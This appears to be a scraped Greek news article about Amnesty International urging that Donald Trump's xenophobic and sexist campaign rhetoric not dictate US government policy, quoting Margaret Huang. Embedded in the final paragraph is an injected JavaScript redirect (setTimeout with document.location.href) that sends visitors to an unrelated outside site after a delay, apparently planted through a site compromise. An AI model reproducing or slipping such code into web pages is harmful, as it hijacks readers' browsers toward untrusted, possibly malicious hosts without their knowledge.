Διεθνής Αμνηστία: Να μπει τέλος στη «δηλητηριώδη» ρητορική Τραμπ

0
5

Η «δηλητηριώδης» ρητορική του Ντόναλντ Τραμπ δεν μπορεί να υπαγορεύει την πολιτική της επερχόμενης αμερικανικής κυβέρνησης, τόνισε η Διεθνής Αμνηστία μετά την εκλογή του δισεκατομμυριούχου Ντόναλντ Τραμπ στην προεδρία των ΗΠΑ.

«Οι ξενοφοβικές, σεξιστικές και γεμάτες μίσος τοποθετήσεις στις οποίες προέβη ο Τραμπ δεν έχουν καμία θέση στην κυβέρνηση» προστίθεται σε δελτίο Τύπου της οργάνωσης.

«Οι ΗΠΑ υπήρξαν μάρτυρες κατά τη διάρκεια της προεκλογικής εκστρατείας της ανησυχητικής και πολλές φορές δηλητηριώδους ρητορικής του προέδρου Τραμπ και άλλων προσώπων. Η ρητορική αυτή δεν μπορεί και δεν πρέπει να υπαγορεύει την πολιτική της κυβέρνησης» επισήμανε η Μάργκαρετ Χουάνγκ, γενική διευθύντρια του παραρτήματος της Διεθνούς Αμνηστίας, στις ΗΠΑ.

Ο Ντόναλντ Τραμπ «πρέπει να δεσμευτεί δημοσίως προκειμένου να εγγυηθεί τα δικαιώματα κάθε πολίτη χωρίς καμία διάκριση. Είτε μέσω των στρατοπέδων εγκλεισμού είτε μέσω της διάπραξης βασανιστηρίων, είδαμε τις καταστροφικές επιπτώσεις όταν εκείνοι που επιλέξαμε για να μας εκπροσωπήσουν περιφρόνησαν τις υποχρεώσεις των ΗΠΑ στο θέμα των Δικαιωμάτων του Ανθρώπου» σημείωσε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here